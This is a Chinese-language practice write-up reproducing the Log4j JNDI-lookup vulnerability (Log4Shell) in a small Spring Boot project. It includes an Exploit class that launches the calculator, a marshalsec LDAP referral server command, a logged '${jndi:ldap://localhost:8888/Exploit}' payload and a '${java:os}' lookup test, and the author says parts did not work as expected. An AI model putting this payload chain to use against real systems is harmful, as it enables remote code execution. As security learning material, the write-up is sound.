简单spring boot项目,之前练习的,现在好像没有达到效果
- 简单的springboot项目 访问 http:localhost:8080 404就是启动成功了
- java调用命令行打开电脑计算器
- TODO 日志那部分有点问题,没有达到预期
spring boot 项目启动类
package com.log4j2test;import org.springframework.boot.SpringApplication;
import org.springframework.boot.autoconfigure.SpringBootApplication;@SpringBootApplication
public class Log4j2Application {public static void main(String[] args) {SpringApplication.run(Log4j2Application.class, args);}}一些日志测试的demo
打开电脑计算器
package com.log4j2test.slf4j;/*** @author* @data 2021/12/20* @time 9:58* @Description java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:7777/#Exploit" 8888*/
public class Exploit {/*** 服务器代码*/static {System.err.println("Pwned");try {String calcStr = "calc";Runtime.getRuntime().exec(calcStr);} catch (Exception var1) {var1.printStackTrace();}}
}
测试日志并且调用打开电脑计算器
public class LogTest {public static final Logger logger = LoggerFactory.getLogger(LogTest.class);public static void main(String[] args) {logger.error("${jndi:ldap://localhost:8888/Exploit}");Exploit exploit =new Exploit();System.out.println(exploit);}
}
controller 这个没有达到预期
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import org.springframework.stereotype.Controller;
import org.springframework.web.bind.annotation.PostMapping;/*** @author* @data 2021/12/20* @time 10:02* @Description*/
@Controller
public class TestController {public static final Logger logger = LoggerFactory.getLogger(LogTest.class);@PostMapping("/slf4j/hello")public void hello(){// 若输出 Java OS系统版本,则说明log4j将${}中的内容当作命令来执行了,不符合预期// 将log4j-core排除后运行该代码,结果则是当做字符串输出,符合预期结果logger.error("java:os : ${java:os}");}
}一个空的application.properties
一个空的spring boot 测试类
package com.log4j2test;import org.junit.jupiter.api.Test;
import org.springframework.boot.test.context.SpringBootTest;@SpringBootTest
class Log4j2ApplicationTests {@Testvoid contextLoads() {}}